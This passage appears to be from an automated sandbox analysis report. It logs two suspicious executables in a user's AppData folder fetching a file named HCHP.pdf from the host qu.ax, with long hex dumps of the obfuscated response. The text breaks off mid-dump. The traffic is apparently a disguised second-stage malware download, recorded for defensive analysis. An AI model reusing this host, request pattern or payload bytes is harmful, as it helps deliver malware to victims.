19 1a
                                                                              Data Ascii: ?gw@yHz"<50 who}x+$Kc_,/@Mj#8r"=PKNZi|_IKSN[ZD+I]&Hh\eoc=\N=yM?G]s<i75shdmT4?SC,+>fok%PdH7r%~5`#d
                                                                              2024-02-21 20:08:49 UTC16384INData Raw: 90 37 f4 80 32 5f 8a 18 10 af ef ba cf 07 fc 5e ef 04 2e 6a 0a 7f 64 9c a4 32 f2 4f 57 a5 fc e5 7b 24 cd 30 a5 90 90 ea f1 43 fc 2a 1d f0 2b 34 da 4e 53 8b fd f9 03 89 a9 93 54 e8 26 d3 ad a6 e6 27 d9 42 f9 5a 69 cf 4f 1d 07 7e af 92 bb 27 6e 08 a8 b6 d0 ea 4c 6c f3 66 e4 83 51 48 e3 5a af 67 ac b9 72 e8 9a 2f f1 a2 20 d6 7c 96 bf 50 b5 4e 73 8b 20 c5 77 4d c3 a7 f8 dd ad 73 95 d2 5e 18 2a e9 6d 0b 4e 2c bd 1b b8 fa bd f8 23 a5 19 1f e6 b3 85 f1 8b 48 49 7c 7c 2b 81 fe bb 9f 5a 12 6d b2 ad 75 f4 bd 88 d1 c1 e5 97 25 60 1f 4a 01 17 ac 36 4a d1 85 b3 bd e8 14 8f 17 e9 5e b1 be 9e 38 9c 09 a6 80 33 ed 52 a7 58 a0 46 55 b1 47 49 3a 4f 53 02 50 e1 74 19 94 c5 05 65 a6 e1 4d 76 b5 21 e4 55 c1 a7 f5 5c 8f d6 61 c4 fe e7 18 51 eb 9d c3 b3 35 4f 5b 35 fb 05 3a 34
                                                                              Data Ascii: 72_^.jd2OW{$0C*+4NST&'BZiO~'nLlfQHZgr/ |PNs wMs^*mN,#HI||+Zmu%`J6J^83RXFUGI:OSPteMv!U\aQ5O[5:4


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.54971145.83.31.1874437128C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-02-21 20:09:04 UTC63OUTGET /HCHP.pdf HTTP/1.1
                                                                              Host: qu.ax
                                                                              Connection: Keep-Alive
                                                                              2024-02-21 20:09:05 UTC356INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Wed, 21 Feb 2024 20:09:05 GMT
                                                                              Content-Type: application/pdf
                                                                              Content-Length: 729088
                                                                              Connection: close
                                                                              Last-Modified: Wed, 21 Feb 2024 16:34:15 GMT
                                                                              Cache-Control: public, max-age=2592000
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                              Accept-Ranges: bytes
                                                                              2024-02-21 20:09:05 UTC16028INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: 9b 74 c0 e3 8d 71 be 07 f7 b7 2f 7e fc f9 a0 2d df 41 6b d3 b9 b2 c2 e1 df 8e 43 3e 4b c0 0e e5 87 0c 65 91 1f 2a 8d d3 c5 fd 41 09 71 11 d5 66 e6 4b 13 53 cf 81 11 92 aa f8 6f 71 a5 20 e7 32 2e a9 dc bf b3 6c 9b 88 6f 42 73 ba 49 e2 d1 b7 38 29 c8 26 28 60 b0 dc e2 4e 9f d1 33 16 ec 3c 65 20 2b af b1 e9 6c d3 7f 0f 08 7b ef 78 32 c3 7a 5d fe b2 36 77 49 b3 6b ca 70 ad a7 70 1a 9c 35 0c ea cf c3 75 1e 2e cc 8b db 4a 8a a7 b2 fa 53 61 9d cc a8 c9 fb 65 79 ba 7d a0 78 d1 c9 77 36 73 55 27 e9 4e 48 bd f8 6b 72 ff 4b c3 aa f1 8d 14 69 d1 e5 32 55 46 d6 d8 60 d4 a4 75 be 50 a6 22 14 f1 a6 d9 84 8b e5 16 78 86 cb 4f 1e b7 0a 07 b8 40 e8 c7 2d 4b 81 6a 98 27 e2 58 68 6d 95 6f bd 28 46 a0 a5 e1 9b c1 e8 32 84 db de 07 34 ef 38 50 2d 15 81 3b 05 4e 38 93 bd fb 52
                                                                              Data Ascii: tq/~-AkC>Ke*AqfKSoq 2.loBsI8)&(`N3<e +l{x2z]6wIkpp5u.JSaey}xw6sU'NHkrKi2UF`uP"xO@-Kj'Xhmo(F248P-;N8R
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: 11 c7 28 d0 54 13 c7 56 eb 69 26 97 dc b2 84 1b 01 1e 12 db fe ea 93 74 a4 8b 03 cf 86 8e 8e f1 4d d6 3a 5d 2b c5 72 a6 81 40 75 2f 9c f5 b6 dc 7d 7f 9a 90 db ff 9e 8f 6a a4 d9 04 67 77 3f 41 e7 5e e1 8a 05 8d 14 30 a7 a2 2c 5a 52 03 f7 df 98 fe 84 8d 62 37 28 cc f7 c3 66 d1 71 2b 68 b9 ce c5 3b 75 ff 39 dd 4b 12 b5 13 d4 35 e4 16 0e 98 d8 c0 29 4e 56 2f 01 39 ff 25 1e b5 dd 95 1a 7a 3a b5 c1 d9 6a ab 2e 2e cc 21 0e 98 35 e0 af 47 5a 8b fb 78 cc 31 05 15 cc 48 b5 e1 02 ea e4 d1 25 01 ea 99 5a be e1 e6 1f 3a 8f bb 49 e4 47 d8 63 2b 11 51 52 e2 2d d2 2c 79 63 11 c4 05 b5 92 8a 96 b6 d0 94 b5 e0 b7 2b 7b cc 7f 7e a4 5d d2 4c f2 9c 81 e1 24 e6 01 b4 ac f7 f0 c9 aa e8 4d 63 71 86 b1 f4 d6 2d 5c 5e b4 8d ba c7 7f 93 3c 9f 3d 22 cf 5e cf 2a 98 bd a0 97 7a a6 56
                                                                              Data Ascii: (TVi&tM:]+r@u/}jgw?A^0,ZRb7(fq+h;u9K5)NV/9%z:j..!5GZx1H%Z:IGc+QR-,yc+{~]L$Mcq-\^<="^*zV
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: 95 ff eb b8 11 77 87 e2 81 cd 3b 02 7d 69 4c ad fb c7 93 bc f9 84 22 36 1c f8 64 a0 38 4e e9 7d 80 c2 e4 1e 55 e2 bb 04 9a f9 d5 af 36 77 15 cb 68 cd 3a ac c7 be bd a9 16 0a 79 68 b3 58 18 22 34 49 b4 15 6d 4e 2b c1 67 64 19 4c 66 f9 72 2b 5f f2 08 46 86 58 37 ac c2 e2 60 53 61 1d 01 35 a0 05 7d 9f ba e1 f9 cf 66 e2 53 0b de 5e 52 fd 13 26 aa 34 29 2c 7f ec 3d 9a 04 4f 54 c5 cc 70 06 ca b1 20 38 cb c6 4d 3e dd fa db e8 cd 23 05 e7 7c fb 7d ce 44 47 b6 6d d1 df 43 e4 40 a5 61 4d 10 c7 40 81 52 d6 15 eb 98 31 64 c4 db ec 4a ef 10 73 9a 16 f1 64 ef 97 e5 a6 17 2e 4a c7 c3 67 a7 ed 53 fd f9 93 9e 97 06 c7 3a ba 46 ed 49 4c b1 bd ff 8d 5b 08 80 22 bc ae 08 d0 4b c6 73 dd 77 c4 6e ba 24 cd 1e 00 fc e2 27 1c e0 cf 6c 9e 58 90 46 2f a7 03 87 4c f4 2f 7e fa 25 b1
                                                                              Data Ascii: w;}iL"6d8N}U6wh:yhX"4ImN+gdLfr+_FX7`Sa5}fS^R&4),=OTp 8M>#|}DGmC@aM@R1dJsd.JgS:FIL["Kswn$'lXF/L/~%
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: 66 e6 d0 55 67 89 50 fd c9 26 5b 77 33 7f e4 b7 c6 24 d5 a0 b9 cb 4b 0a f5 00 e4 3b fe 66 b2 29 cb 7b 03 62 0e 89 02 ee b7 ca 54 f1 8a 93 8b 11 5f 58 d3 7c d1 16 46 ef 57 b1 8b ee 52 ad 09 66 cf d0 b4 70 92 e4 9b be b5 1b b9 cc 40 fc 37 be d1 25 dd 3a 4c eb 29 c2 a1 e9 dd 74 24 49 5d be 82 ae e2 03 22 04 e7 e3 e6 35 4c 6d 22 ca 91 38 0c 23 8e 19 c6 d3 5f 25 37 cd 7e ee b2 d6 37 c0 17 e4 11 4f c8 11 ac e4 7f 68 ff b6 c2 09 46 76 90 c4 40 ca 21 58 89 e4 3e c1 b0 2f f3 af a7 e5 25 2e 45 1e d0 d9 dd a5 fe d7 b9 03 ff 50 2f 1a fb 55 ed 24 04 31 b9 d2 31 6c 49 29 bc d8 30 37 73 07 0a a7 fc 36 35 86 6c 01 43 24 72 bb 01 96 f5 7f 5f 59 a7 f9 eb 84 dc 51 d2 2f 97 5c c4 87 00 6f a7 2e 65 6a bf d5 b9 0b db 6d 35 55 aa 06 ce 4a 56 7b c4 39 ea 13 e8 68 7d 73 e7 59 2b
                                                                              Data Ascii: fUgP&[w3$K;f){bT_X|FWRfp@7%:L)t$I]"5Lm"8#_%7~7OhFv@!X>/%.EP/U$11lI)07s65lC$r_YQ/\o.ejm5UJV{9h}sY+
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: d4 c1 b0 02 49 fc 31 ac 55 34 05 de 86 29 bd ff d7 50 99 4a 39 d1 50 b6 e1 c6 a9 71 6c e8 a6 0d 3d 3b e2 29 80 6f d8 93 9e 2a 59 3d 5d ef 6d 82 00 84 0c 9f cf 28 45 99 6d 33 ca 02 57 d9 55 5c 17 99 cc 65 43 77 28 be 2a ef 66 36 6a b5 8e b9 6d a9 2f 8f f7 6c f0 d1 a2 fe 8d 8d b3 01 f8 7e 89 ec f9 45 c8 2a ab a7 f9 05 e8 46 59 31 f6 76 3a b5 e8 63 b6 b3 35 4d 06 90 d0 74 dc 77 b0 34 a5 ac da c0 1d 08 73 75 db 8d c9 aa 17 51 78 1b e2 81 27 39 41 29 63 0a 0f a7 70 29 7b 39 1e b4 15 63 1c 53 5a 47 ce eb e8 b5 7b 24 48 46 b9 90 7c 1d c3 a6 77 91 b1 69 19 48 23 37 14 9f d3 15 8a d3 ed f0 57 19 98 18 f5 eb 2c a1 c3 8c db df 2f 17 ea a6 93 a5 44 b3 7d a0 ac 9a f6 9a dc 69 3f 82 2e 2a 9e e3 c3 b9 c4 22 da 1f 79 3d 04 de 22 f3 b4 29 5d 64 4d a8 b0 4e 6a fe fd d4 0e
                                                                              Data Ascii: I1U4)PJ9Pql=;)o*Y=]m(Em3WU\eCw(*f6jm/l~E*FY1v:c5Mtw4suQx'9A)cp){9cSZG{$HF|wiH#7W,/D}i?.*"y=")]dMNj
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: 1c c8 22 eb 70 2c b9 66 98 09 df 9f 75 fb 0f 99 1f 20 d1 29 a4 e4 42 28 6c 5e 4c d8 db 17 8f 84 3e 95 b4 45 dd 70 6c 57 93 98 f7 80 b2 af 3f 59 5f cf df 19 0b 42 89 a7 7e 36 10 8e 56 a0 5e 99 41 ae 64 f6 2e c7 db 3d 66 08 c4 19 dc c2 ee 9f d4 c9 11 0a 66 aa a4 19 b8 62 db 5f 65 40 47 07 b2 f6 bd c1 27 71 d0 f4 13 9c 93 1c 37 a5 1b 3c e8 1b 63 1b 93 5a 7e cf b3 ae 93 9c 9b 11 9e f9 07 b7 c8 c8 32 65 8a 93 4e 61 61 cd f9 11 45 fd 93 3c 52 a3 b2 17 7f 6c d8 2c c3 45 44 35 cd 09 3a 32 f9 a5 e1 e7 31 51 c2 2b d2 c9 d3 8c 74 6e 23 c8 24 bf 70 a2 65 10 d1 ec 74 25 1e 0f 7e ef 8e cc 2a 2e 5f 8c 3a c2 a8 42 7f 2a f3 e5 a6 97 4e 5b d5 70 04 de 17 ba fa 56 05 8e 42 c6 6c e5 5c 07 5b 79 ed 7c e4 a5 bd 3b b0 c2 86 98 fd 1d e1 e3 ca 37 fb 96 c0 5b 0d 47 a8 93 e6 6a 62
                                                                              Data Ascii: "p,fu )B(l^L>EplW?Y_B~6V^Ad.=ffb_e@G'q7<cZ~2eNaaE<Rl,ED5:21Q+tn#$pet%~*._:B*N[pVBl\[y|;7[Gjb
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: 6d 0a f4 a2 68 03 8c 1e c4 a0 48 5e 7b 38 7e d9 a3 04 88 5a 31 eb db 4c 78 66 da 33 1c 6c ec 6b 8d d5 63 13 5f 2a 9a d9 8a ef fd 8c c3 48 e5 0b b7 7e f9 42 9e 2b 9b d1 79 1c a2 76 86 06 12 e8 48 6e d1 a6 90 9a 47 70 0f 35 17 70 8b 58 f0 2f b6 a2 0d 68 c2 8e 8d 62 c5 32 c1 19 66 91 5b 57 e9 1a 4f 81 17 97 30 46 48 25 5c ff 1c 08 0b 18 86 25 b2 25 50 ed f3 e3 c9 34 2c b0 79 93 1e 1f 03 95 11 80 1c 29 44 3e 2a 21 92 6a 28 79 b0 9f ac 11 e2 79 5e 0c e3 20 0d 5b 1e 06 1e 4e bf 65 f9 54 eb 53 97 a5 7a e2 0b 6e b9 ff 01 8d 14 d6 39 3e 16 78 9d 0d d2 46 e6 43 2c 8c 2b 4a e9 c4 fd fd 9d e4 a0 0f 26 3d 4f ed d8 7a 1c 07 7f 98 c3 ea cd 26 99 de f8 ee 6c c4 84 57 8e 32 b0 fb 05 f7 5a 05 c5 d9 80 83 e7 cc 4e 75 0e 00 46 70 54 a9 94 bf d2 d3 2f fc 74 09 16 87 a6 6e 4f
                                                                              Data Ascii: mhH^{8~Z1Lxf3lkc_*H~B+yvHnGp5pX/hb2f[WO0FH%\%%P4,y)D>*!j(yy^ [NeTSzn9>xFC,+J&=Oz&lW2ZNuFpT/tnO
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: 13 c1 3f 19 67 77 40 79 a5 df 95 1e ec 0a 13 b0 13 06 ba d2 48 7a c1 bf 22 ae 3c f7 35 30 93 a0 ea f1 c8 13 d1 20 77 68 bd d4 c6 b3 c4 6f 7d d2 78 2b 24 4b 63 5f 2c ad c2 2f ec da fc 40 4d 6a 23 d4 cf 7f ce b3 38 04 02 f3 82 72 f3 fe 22 3d 86 1c 50 9f 0a 4b 9e c8 4e d3 5a 69 7c f5 18 5f 49 4b 53 e6 d7 d6 c4 ad 4e d1 c1 a6 d8 5b 5a b1 44 99 85 a1 2b c1 b7 49 5d aa 8b 26 48 68 5c cd af 65 83 fc 6f 9c 63 b0 3d 5c 4e 8a 3d 81 8e 79 94 16 4d 3f 47 f3 cc ea 8a a0 87 5d 00 0c 73 3c bf c3 be ab dc c3 e1 e5 69 9a 88 f3 37 dc 35 73 68 64 e2 6d d1 10 8e 05 54 ea 34 e2 7f f5 3f fc b2 53 ea 1d b2 43 fb 2c 10 2b 3e 93 cf ee 66 ed 6f ba 17 04 6b 25 50 8d be 9e e7 83 0b fa e8 97 1b da 9d 64 48 1b a5 37 e0 82 72 25 7e 35 90 60 ee 04 c8 81 9a d6 a2 a1 81 96 23 64 d9 19 1a
                                                                              Data Ascii: ?gw@yHz"<50 who}x+$Kc_,/@Mj#8r"=PKNZi|_IKSN[ZD+I]&Hh\eoc=\N=yM?G]s<i75shdmT4?SC,+>fok%PdH7r%~5`#d
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: 90 37 f4 80 32 5f 8a 18 10 af ef ba cf 07 fc 5e ef 04 2e 6a 0a 7f 64 9c a4 32 f2 4f 57 a5 fc e5 7b 24 cd 30 a5 90 90 ea f1 43 fc 2a 1d f0 2b 34 da 4e 53 8b fd f9 03 89 a9 93 54 e8 26 d3 ad a6 e6 27 d9 42 f9 5a 69 cf 4f 1d 07 7e af 92 bb 27 6e 08 a8 b6 d0 ea 4c 6c f3 66 e4 83 51 48 e3 5a af 67 ac b9 72 e8 9a 2f f1 a2 20 d6 7c 96 bf 50 b5 4e 73 8b 20 c5 77 4d c3 a7 f8 dd ad 73 95 d2 5e 18 2a e9 6d 0b 4e 2c bd 1b b8 fa bd f8 23 a5 19 1f e6 b3 85 f1 8b 48 49 7c 7c 2b 81 fe bb 9f 5a 12 6d b2 ad 75 f4 bd 88 d1 c1 e5 97 25 60 1f 4a 01 17 ac 36 4a d1 85 b3 bd e8 14 8f 17 e9 5e b1 be 9e 38 9c 09 a6 80 33 ed 52 a7 58 a0 46 55 b1 47 49 3a 4f 53 02 50 e1 74 19 94 c5 05 65 a6 e1 4d 76 b5 21 e4 55 c1 a7 f5 5c 8f d6 61 c4 fe e7 18 51 eb 9d c3 b3 35 4f 5b 35 fb 05 3a 34
                                                                              Data Ascii: 72_^.jd2OW{$0C*+4NST&'BZiO~'nLlfQHZgr/ |PNs wMs^*mN,#HI||+Zmu%`J6J^83RXFUGI:OSPteMv!U\aQ5O[5:4


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.54972345.83.31.1874437056C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-02-21 20:09:13 UTC63OUTGET /HCHP.pdf HTTP/1.1
                                                                              Host: qu.ax
                                                                              Connection: Keep-Alive
                                                                              2024-02-21 20:09:13 UTC356INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Wed, 21 Feb 2024 20:09:13 GMT
                                                                              Content-Type: application/pdf
                                                                              Content-Length: 729088
                                                                              Connection: close
                                                                              Last-Modified: Wed, 21 Feb 2024 16:34:15 GMT
                                                                              Cache-Control: public, max-age=2592000
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                              Accept-Ranges: bytes
                                                                              2024-02-21 20:09:13 UTC16028INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              2024-02-21 20:09:13 UTC16384INData Raw: 9b 74 c0 e3 8d 71 be 07 f7 b7 2f 7e fc f9 a0 2d df 41 6b d3 b9 b2 c2 e1 df 8e 43 3e 4b c0 0e e5 87 0c 65 91 1f 2a 8d d3 c5 fd 41 09 71 11 d5 66 e6 4b 13 53 cf 81 11 92 aa f8 6f 71 a5 20 e7 32 2e a9 dc bf b3 6c 9b 88 6f 42 73 ba 49 e2 d1 b7 38 29 c8 26 28 60 b0 dc e2 4e 9f d1 33 16 ec 3c 65 20 2b af b1 e9 6c d3 7f 0f 08 7b ef 78 32 c3 7a 5d fe b2 36 77 49 b3 6b ca 70 ad a7 70 1a 9c 35 0c ea cf c3 75 1e 2e cc 8b db 4a 8a a7 b2 fa 53 61 9d cc a8 c9 fb 65 79 ba 7d a0 78 d1 c9 77 36 73 55 27 e9 4e 48 bd f8 6b 72 ff 4b c3 aa f1 8d 14 69 d1 e5 32 55 46 d6 d8 60 d4 a4 75 be 50 a6 22 14 f1 a6 d9 84 8b e5 16 78 86 cb 4f 1e b7 0a 07 b8 40 e8 c7 2d 4b 81 6a 98 27 e2 58 68 6d 95 6f bd 28 46 a0 a5 e1 9b c1 e8 32 84 db de 07 34 ef 38 50 2d 15 81 3b 05 4e 38 93 bd fb 52
                                                                              Data Ascii: tq/~-AkC>Ke*AqfKSoq 2.loBsI8)&(`N3<e +l{x2z]6wIkpp5u.JSaey}xw6sU'NHkrKi2UF`uP"xO@-Kj'Xhmo(F248P-;N8R
                                                                              2024-02-21 20:09:13 UTC16384INData Raw: 11 c7 28 d0 54 13 c7 56 eb 69 26 97 dc b2 84 1b 01 1e 12 db fe ea 93 74 a4 8b 03 cf 86 8e 8e f1 4d d6 3a 5d 2b c5 72 a6 81 40 75 2f 9c f5 b6 dc 7d 7f 9a 90 db ff 9e 8f 6a a4 d9 04 67 77 3f 41 e7 5e e1 8a 05 8d 14 30 a7 a2 2c 5a 52 03 f7 df 98 fe 84 8d 62 37 28 cc f7 c3 66 d1 71 2b 68 b9 ce c5 3b 75 ff 39 dd 4b 12 b5 13 d4 35 e4 16 0e 98 d8 c0 29 4e 56 2f 01 39 ff 25 1e b5 dd 95 1a 7a 3a b5 c1 d9 6a ab 2e 2e cc 21 0e 98 35 e0 af 47 5a 8b fb 78 cc 31 05 15 cc 48 b5 e1 02 ea e4 d1 25 01 ea 99 5a be e1 e6 1f 3a 8f bb 49 e4 47 d8 63 2b 11 51 52 e2 2d d2 2c 79 63 11 c4 05 b5 92 8a 96 b6 d0 94 b5 e0 b7 2b 7b cc 7f 7e a4 5d d2 4c f2 9c 81 e1 24 e6 01 b4 ac f7 f0 c9 aa e8 4d 63 71 86 b1 f4 d6 2d 5c 5e b4 8d ba c7 7f 93 3c 9f 3d 22 cf 5e cf 2a 98 bd a0 97 7a a6 56
                                                                              Data Ascii: (TVi&tM:]+r@u/}jgw?A^0,ZRb7(fq+h;u9K5)NV/9%z:j..!5GZx1H%Z:IGc+QR-,yc+{~]L$Mcq-\^<="^*zV
                                                                              2024-02-21 20:09:13 UTC16384INData Raw: 95 ff eb b8 11 77 87 e2 81 cd 3b 02 7d 69 4c ad fb c7 93 bc f9 84 22 36 1c f8 64 a0 38 4e e9 7d 80 c2 e4 1e 55 e2 bb 04 9a f9 d5 af 36 77 15 cb 68 cd 3a ac c7 be bd a9 16 0a 79 68 b3 58 18 22 34 49 b4 15 6d 4e 2b c1 67 64 19 4c 66 f9 72 2b 5f f2 08 46 86 58 37 ac c2 e2 60 53 61 1d 01 35 a0 05 7d 9f ba e1 f9 cf 66 e2 53 0b de 5e 52 fd 13 26 aa 34 29 2c 7f ec 3d 9a 04 4f 54 c5 cc 70 06 ca b1 20 38 cb c6 4d 3e dd fa db e8 cd 23 05 e7 7c fb 7d ce 44 47 b6 6d d1 df 43 e4 40 a5 61 4d 10 c7 40 81 52 d6 15 eb 98 31 64 c4 db ec 4a ef 10 73 9a 16 f1 64 ef 97 e5 a6 17 2e 4a c7 c3 67 a7 ed 53 fd f9 93 9e 97 06 c7 3a ba 46 ed 49 4c b1 bd ff 8d 5b 08 80 22 bc ae 08 d0 4b c6 73 dd 77 c4 6e ba 24 cd 1e 00 fc e2 27 1c e0 cf 6c 9e 58 90 46 2f a7 03 87 4c f4 2f 7e fa 25 b1
                                                                              Data Ascii: w;}iL"6d8N}U6wh:yhX"4ImN+gdLfr+_FX7`Sa5}fS^R&4),=OTp 8M>#|}DGmC@aM@R1dJsd.JgS:FIL["Kswn$'lXF/L/~%
                                                                              2024-02-21 20:09:13 UTC16384INData Raw: 66 e6 d0 55 67 89 50 fd c9 26 5b 77 33 7f e4 b7 c6 24 d5 a0 b9 cb 4b 0a f5 00 e4 3b fe 66 b2 29 cb 7b 03 62 0e 89 02 ee b7 ca 54 f1 8a 93 8b 11 5f 58 d3 7c d1 16 46 ef 57 b1 8b ee 52 ad 09 66 cf d0 b4 70 92 e4 9b be b5 1b b9 cc 40 fc 37 be d1 25 dd 3a 4c eb 29 c2 a1 e9 dd 74 24 49 5d be 82 ae e2 03 22 04 e7 e3 e6 35 4c 6d 22 ca 91 38 0c 23 8e 19 c6 d3 5f 25 37 cd 7e ee b2 d6 37 c0 17 e4 11 4f c8 11 ac e4 7f 68 ff b6 c2 09 46 76 90 c4 40 ca 21 58 89 e4 3e c1 b0 2f f3 af a7 e5 25 2e 45 1e d0 d9 dd a5 fe d7 b9 03 ff 50 2f 1a fb 55 ed 24 04 31 b9 d2 31 6c 49 29 bc d8 30 37 73 07 0a a7 fc 36 35 86 6c 01 43 24 72 bb 01 96 f5 7f 5f 59 a7 f9 eb 84 dc 51 d2 2f 97 5c c4 87 00 6f a7 2e 65 6a bf d5 b9 0b db 6d 35 55 aa 06 ce 4a 56 7b c4 39 ea 13 e8 68 7d 73 e7 59 2b
                                                                              Data Ascii: fUgP&[w3$K;f){bT_X|FWRfp@7%:L)t$I]"5Lm"8#_%7~7OhFv@!X>/%.EP/U$11lI)07s65lC$r_YQ/\o.ejm5UJV{9h}sY+
                                                                              2024-02-21 20:09:13 UTC16384INData Raw: d4 c1 b0 02 49 fc 31 ac 55 34 05 de 86 29 bd ff d7 50 99 4a 39 d1 50 b6 e1 c6 a9 71 6c e8 a6 0d 3d 3b e2 29 80 6f d8 93 9e 2a 59 3d 5d ef 6d 82 00 84 0c 9f cf 28 45 99 6d 33 ca 02 57 d9 55 5c 17 99 cc 65 43 77 28 be 2a ef 66 36 6a b5 8e b9 6d a9 2f 8f f7 6c f0 d1 a2 fe 8d 8d b3 01 f8 7e 89 ec f9 45 c8 2a ab a7 f9 05 e8 46 59 31 f6 76 3a b5 e8 63 b6 b3 35 4d 06 90 d0 74 dc 77 b0 34 a5 ac da c0 1d 08 73 75 db 8d c9 aa 17 51 78 1b e2 81 27 39 41 29 63 0a 0f a7 70 29 7b 39 1e b4 15 63 1c 53 5a 47 ce eb e8 b5 7b 24 48 46 b9 90 7c 1d c3 a6 77 91 b1 69 19 48 23 37 14 9f d3 15 8a d3 ed f0 57 19 98 18 f5 eb 2c a1 c3 8c db df 2f 17 ea a6 93 a5 44 b3 7d a0 ac 9a f6 9a dc 69 3f 82 2e 2a 9e e3 c3 b9 c4 22 da 1f 79 3d 04 de 22 f3 b4 29 5d 64 4d a8 b0 4e 6a fe fd d4 0e
                                                                              Data Ascii: I1U4)PJ9Pql=;)o*Y=]m(Em3WU\eCw(*f6jm/l~E*FY1v:c5Mtw4suQx'9A)cp){9cSZG{$HF|wiH#7W,/D}i?.*"y=")]dMNj
                                                                              2024-02-21 20:09:13 UTC16384INData Raw: 1c c8 22 eb 70 2c b9 66 98 09 df 9f 75 fb 0f 99 1f 20 d1 29 a4 e4 42 28 6c 5e 4c d8 db 17 8f 84 3e 95 b4 45 dd 70 6c 57 93 98 f7 80 b2 af 3f 59 5f cf df 19 0b 42 89 a7 7e 36 10 8e 56 a0 5e 99 41 ae 64 f6 2e c7 db 3d 66 08 c4 19 dc c2 ee 9f d4 c9 11 0a 66 aa a4 19 b8 62 db 5f 65 40 47 07 b2 f6 bd c1 27 71 d0 f4 13 9c 93 1c 37 a5 1b 3c e8 1b 63 1b 93 5a 7e cf b3 ae 93 9c 9b 11 9e f9 07 b7 c8 c8 32 65 8a 93 4e 61 61 cd f9 11 45 fd 93 3c 52 a3 b2 17 7f 6c d8 2c c3 45 44 35 cd 09 3a 32 f9 a5 e1 e7 31 51 c2 2b d2 c9 d3 8c 74 6e 23 c8 24 bf 70 a2 65 10 d1 ec 74 25 1e 0f 7e ef 8e cc 2a 2e 5f 8c 3a c2 a8 42 7f 2a f3 e5 a6 97 4e 5b d5 70 04 de 17 ba fa 56 05 8e 42 c6 6c e5 5c 07 5b 79 ed 7c e4 a5 bd 3b b0 c2 86 98 fd 1d e1 e3 ca 37 fb 96 c0 5b 0d 47 a8 93 e6 6a 62
                                                                              Data Ascii: "p,fu )B(l^L>EplW?Y_B~6V^Ad.=ffb_e@G'q7<cZ~2eNaaE<Rl,ED5:21Q+tn#$pet%~*._:B*N[pVBl\[y|;7[Gjb
                                                                              2024-02-21 20:09:13 UTC16384INData Raw: 6d 0a f4 a2 68 03 8c 1e c4 a0 48 5e 7b 38 7e d9 a3 04 88 5a 31 eb db 4c 78 66 da 33 1c 6c ec 6b 8d d5 63 13 5f 2a 9a d9 8a ef fd 8c c3 48 e5 0b b7 7e f9 42 9e 2b 9b d1 79 1c a2 76 86 06 12 e8 48 6e d1 a6 90 9a 47 70 0f 35 17 70 8b 58 f0 2f b6 a2 0d 68 c2 8e 8d 62 c5 32 c1 19 66 91 5b 57 e9 1a 4f 81 17 97 30 46 48 25 5c ff 1c 08 0b 18 86 25 b2 25 50 ed f3 e3 c9 34 2c b0 79 93 1e 1f 03 95 11 80 1c 29 44 3e 2a 21 92 6a 28 79 b0 9f ac 11 e2 79 5e 0c e3 20 0d 5b 1e 06 1e 4e bf 65 f9 54 eb 53 97 a5 7a e2 0b 6e b9 ff 01 8d 14 d6 39 3e 16 78 9d 0d d2 46 e6 43 2c 8c 2b 4a e9 c4 fd fd 9d e4 a0 0f 26 3d 4f ed d8 7a 1c 07 7f 98 c3 ea cd 26 99 de f8 ee 6c c4 84 57 8e 32 b0 fb 05 f7 5a 05 c5 d9 80 83 e7 cc 4e 75 0e 00 46 70 54 a9 94 bf d2 d3 2f fc 74 09 16 87 